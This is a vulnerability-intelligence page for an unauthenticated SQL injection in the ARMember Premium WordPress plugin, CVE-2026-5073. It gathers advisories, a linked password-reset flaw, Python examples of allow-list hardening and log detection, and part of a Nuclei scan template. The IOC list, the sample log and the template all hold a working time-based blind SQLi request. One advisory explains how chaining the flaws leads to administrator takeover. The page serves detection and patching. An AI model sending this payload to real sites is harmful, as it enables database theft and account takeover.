CVE-2026-5073
Published 2026-06-02
Priority P180 · high · CVSS 3.1: 7.5
CVSS vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
ITW exploit · VulnCheck KEV
Exploited in the wild
EPSS: 1.38% (68.7th percentile)
The ARMember Premium plugin for WordPress is vulnerable to SQL Injection via the 'order' parameter of the 'arm_directory_paging_action' AJAX action in all versions up to, and including, 7.3.1. This is due to insufficient escaping on the user-supplied 'order' and 'orderby' parameters and the lack of sufficient preparation on the existing SQL query in the `arm_get_directory_members()` function. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
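The root cause named above is that ORDER BY takes identifiers and expressions, not string literals, so column names and sort directions cannot be bound as prepared-statement parameters and escaping alone does not neutralize them; the standard fix is an allow-list. The following Python sketch is added here as an illustration of that bug class and is not the plugin's own (PHP) code: it shows the weak query builder beside the allow-listed one, run against an in-memory SQLite table whose column names are assumptions.

```python
import sqlite3

# Allow-lists for the two sort parameters. The column names are assumptions
# chosen for this illustration; a real plugin would list its own columns.
ALLOWED_ORDERBY = {"display_name", "user_email", "user_registered", "ID"}
ALLOWED_ORDER = {"ASC", "DESC"}


def build_query_unsafe(orderby: str, order: str) -> str:
    """'Before' form: request parameters are interpolated straight into ORDER BY.
    Quote-escaping does not help here because ORDER BY does not take quoted
    strings, so a value like display_name,IF(1=1,SLEEP(6),0) becomes SQL."""
    return f"SELECT ID, display_name FROM users ORDER BY {orderby} {order}"


def build_query_safe(orderby: str, order: str) -> str:
    """Hardened form: only allow-listed column names and directions reach the query."""
    if orderby not in ALLOWED_ORDERBY:
        raise ValueError(f"orderby not allowed: {orderby!r}")
    order = order.upper()
    if order not in ALLOWED_ORDER:
        raise ValueError(f"order not allowed: {order!r}")
    # Both tokens are now our own constants, never raw request input.
    return f"SELECT ID, display_name FROM users ORDER BY {orderby} {order}"


def is_rejected(orderby: str, order: str) -> bool:
    """True when the hardened builder refuses the pair of parameters."""
    try:
        build_query_safe(orderby, order)
    except ValueError:
        return True
    return False


def fetch_members(orderby: str, order: str) -> list:
    """Run the hardened query against a constructed in-memory table and
    return the display names in the requested order."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (ID INTEGER PRIMARY KEY, display_name TEXT, "
        "user_email TEXT, user_registered TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (display_name, user_email, user_registered) VALUES (?, ?, ?)",
        [
            ("carol", "carol@example.invalid", "2026-01-03"),  # constructed rows
            ("alice", "alice@example.invalid", "2026-01-01"),
            ("bob", "bob@example.invalid", "2026-01-02"),
        ],
    )
    rows = conn.execute(build_query_safe(orderby, order)).fetchall()
    conn.close()
    return [name for _, name in rows]


if __name__ == "__main__":
    print(fetch_members("display_name", "asc"))
    print(is_rejected("display_name,IF(1=1,SLEEP(6),0)", "ASC"))
```

The same allow-list shape applies to any parameter that ends up in an identifier position (table names, column names, sort direction, LIMIT keywords): validate against a fixed set, then use the matched constant, not the user's string.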
Detection & IOCs (extracted from sources)
- url: /wp-admin/admin-ajax.php
- command: action=arm_directory_paging_action&pagination=infinite&id=1&type=directory&orderby=display_name,IF(1=1,SLEEP(6),0)&order=ASC&per_page=10&current_page=1&arm_wp_nonce={{nonce}}
- other: arm_wp_nonce
- Detect exploitation attempts by monitoring POST requests to /wp-admin/admin-ajax.php whose 'action' parameter is 'arm_directory_paging_action' and whose 'orderby' parameter carries time-based blind SQL injection payloads (e.g., SLEEP, IF).
- The PoC treats a response duration of >= 6 seconds as its time-based blind SQLi indicator; monitor for anomalously slow responses from this AJAX endpoint.
- The exploit is unauthenticated: no session cookie or authentication header is required. Any POST to admin-ajax.php with action=arm_directory_paging_action from an unauthenticated source should be treated as suspicious.
- The nonce value 'arm_wp_nonce' is harvested from the page before exploitation (regex: `]*value='([a-f0-9]+)'`); monitor for reconnaissance GET requests that fetch this nonce shortly before an SQLi POST.
- Confirm exploitation by checking whether the response body contains 'arm_directory_paging_container', which the PoC uses as the positive indicator of a successful injected query.
- All versions of ARMember Premium up to and including 7.3.1 are vulnerable; check the installed plugin version when scoping detection rules.
- The injection point is the 'order' and 'orderby' parameters of the arm_directory_paging_action AJAX action, handled in the arm_get_directory_members() function; WAF rules should cover both parameters.
- The PoC uses a 15-second HTTP timeout to accommodate the SLEEP(6) payload; response-time anomaly detection for this endpoint should use a threshold of >= 6 seconds.
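The detection points above combine naturally into one log rule: endpoint plus action, a payload check on 'orderby' and 'order', the >= 6 second response-time threshold, and the absence of a session cookie. The scanner below is an added example, not code from the source advisories or from the Nuclei template. It assumes a JSON-lines feed in which the WAF or reverse proxy records the POST body, the cookie header and the response time; the field names are assumptions and the sample lines, nonce values included, are constructed.

```python
import json
import re
from urllib.parse import parse_qs

ENDPOINT = "/wp-admin/admin-ajax.php"
ACTION = "arm_directory_paging_action"
SLOW_MS = 6000  # the PoC payload sleeps 6 s; the page recommends a >= 6 s threshold

# Time-based tokens named on the page (SLEEP, IF), plus shape checks: a legitimate
# orderby is a bare column name and a legitimate order is ASC or DESC.
SQL_TOKEN_RE = re.compile(r"\b(SLEEP|IF)\s*\(", re.IGNORECASE)
IDENT_RE = re.compile(r"^[A-Za-z0-9_.]+$")

# Constructed sample log lines (JSON-lines; field names are assumptions).
SAMPLE_LOG = r'''
{"ts": "2026-06-02T10:00:01Z", "src": "203.0.113.10", "method": "GET", "path": "/members/", "body": "", "cookie": "", "duration_ms": 120, "status": 200}
{"ts": "2026-06-02T10:00:02Z", "src": "203.0.113.10", "method": "POST", "path": "/wp-admin/admin-ajax.php", "body": "action=arm_directory_paging_action&pagination=infinite&id=1&type=directory&orderby=display_name,IF(1=1,SLEEP(6),0)&order=ASC&per_page=10&current_page=1&arm_wp_nonce=deadbeef01", "cookie": "", "duration_ms": 6210, "status": 200}
{"ts": "2026-06-02T10:00:05Z", "src": "198.51.100.7", "method": "POST", "path": "/wp-admin/admin-ajax.php", "body": "action=arm_directory_paging_action&pagination=infinite&id=1&type=directory&orderby=display_name&order=DESC&per_page=10&current_page=2&arm_wp_nonce=deadbeef02", "cookie": "wordpress_logged_in_x=1", "duration_ms": 95, "status": 200}
{"ts": "2026-06-02T10:00:09Z", "src": "203.0.113.10", "method": "POST", "path": "/wp-admin/admin-ajax.php", "body": "action=arm_directory_paging_action&id=1&type=directory&orderby=display_name&order=ASC&per_page=10&arm_wp_nonce=deadbeef01", "cookie": "", "duration_ms": 80, "status": 200}
{"ts": "2026-06-02T10:00:12Z", "src": "192.0.2.44", "method": "POST", "path": "/wp-admin/admin-ajax.php", "body": "action=heartbeat", "cookie": "wordpress_logged_in_x=1", "duration_ms": 40, "status": 200}
'''


def analyze_request(rec: dict) -> list[str]:
    """Return the list of detection reasons that fire for one log record."""
    reasons: list[str] = []
    if rec.get("method") != "POST" or rec.get("path") != ENDPOINT:
        return reasons
    params = {k: v[0] for k, v in parse_qs(rec.get("body", ""), keep_blank_values=True).items()}
    if params.get("action") != ACTION:
        return reasons
    for name in ("orderby", "order"):
        value = params.get(name, "")
        if SQL_TOKEN_RE.search(value):
            reasons.append(f"sql-token-in-{name}")
        elif name == "order" and value.upper() not in ("ASC", "DESC", ""):
            reasons.append("order-not-asc-desc")
        elif name == "orderby" and value and not IDENT_RE.match(value):
            reasons.append("orderby-not-identifier")
    if rec.get("duration_ms", 0) >= SLOW_MS:
        reasons.append("slow-response")
    if not rec.get("cookie"):
        reasons.append("unauthenticated")  # the endpoint is reachable without a session
    return reasons


def severity(reasons: list[str]):
    """Rank: payload indicator > slow response alone > unauthenticated call alone."""
    if any(r.startswith(("sql-token", "order")) for r in reasons):
        return "high"
    if "slow-response" in reasons:
        return "medium"
    if "unauthenticated" in reasons:
        return "low"
    return None


def scan(log_text: str) -> list[dict]:
    """Scan a JSON-lines log and return one alert per flagged request."""
    alerts = []
    for line in log_text.strip().splitlines():
        rec = json.loads(line)
        reasons = analyze_request(rec)
        sev = severity(reasons)
        if sev:
            alerts.append({"ts": rec["ts"], "src": rec["src"], "severity": sev, "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(json.dumps(alert))
```

The shape checks matter more than the token list: a WAF signature on SLEEP alone is trivially varied, whereas "orderby must be a single identifier and order must be ASC or DESC" flags any value the vulnerable function would treat as SQL. Correlating the low-severity unauthenticated calls with a preceding GET that fetched the nonce from the same source would cover the reconnaissance step noted above.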
CVSS provenance
- nvd: v3.1 7.5 HIGH, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
- vulncheck: 7.5 HIGH
VulDB
vuldb · 2026-06-03 · CVSS 7.5
CVE-2026-5073 [HIGH] ARMember Premium Plugin up to 7.3.1 on WordPress AJAX Action arm_get_directory_members order/orderby sql injection
A vulnerability marked as critical has been reported in ARMember Premium Plugin up to 7.3.1 on WordPress. This affects the function arm_get_directory_members of the component AJAX Action Handler. The manipulation of the argument order/orderby leads to sql injection.
This vulnerability is uniquely identified as CVE-2026-5073. The attack can be carried out remotely. No exploit exists.
GHSA
ghsa_unreviewed · 2026-06-02 · CVSS 7.5
CVE-2026-5076 [HIGH] CWE-287 The ARMember Premium plugin for WordPress is vulnerable to an insecure password reset mechanism in all versions up to, and including, 7.3.1.
The ARMember Premium plugin for WordPress is vulnerable to an insecure password reset mechanism in all versions up to, and including, 7.3.1. The plugin stores a plaintext copy of the password reset key in the `arm_reset_password_key` user meta field when a user requests a password reset. This is in addition to the hashed key that WordPress core stores securely in `wp_users.user_activation_key`. The plaintext key stored in `wp_usermeta` can be used with the plugin's custom `armrp` reset action to set a new password for any user. Combined with another vulnerability such as SQL Injection (CVE-2026-5073, CVE-2026-5074), this makes it possible for unauthenticated attackers to extract the plaintext reset key and take over any user account, including administrators.
GHSA
ghsa_unreviewed · 2026-06-02
CVE-2026-5073 [HIGH] CWE-89 The ARMember Premium plugin for WordPress is vulnerable to SQL Injection via the 'order' parameter of the 'arm_directory_paging_action' AJAX action in all versions up to, and including, 7.3.1.
VulnCheck
vulncheck · 2026 · CVSS 7.5
CVE-2026-5073 [HIGH] Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitig
No detection rules found.
Nuclei
nuclei · CVSS 7.5
CVE-2026-5073 [HIGH] WordPress ARMember Premium <= 7.3.1 - Unauthenticated SQL Injection
# The template head (id, info block, the nonce-harvesting GET request and the start of
# its regex extractor) is truncated on the page; only the tail of that regex survives:
#   ]*value='([a-f0-9]+)'
    matchers:
      - type: word
        words:
          - "arm_wp_nonce"
        internal: true
  - id: sqli
    raw:
      - |
        @timeout: 15s
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=arm_directory_paging_action&pagination=infinite&id=1&type=directory&orderby=display_name,IF(1=1,SLEEP(6),0)&order=ASC&per_page=10&current_page=1&arm_wp_nonce={{nonce}}
    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - "duration>=6"
      - type: word
        part: body
        words:
          - "arm_directory_paging_container"
# digest: 4a0a00473045022100ae53d4e9e6d63fbf8361afe21b261b1e671791f2623f344a2777f62f5fa0420802204bd340155fe11bbf495fba6433efbd41572709328adce55fa6477c712558bd4d:922c64590222798bb761d5b6d8e72950
No writeups or analysis indexed.
Timeline
- 2026-06-02: Published
- Exploited in the wild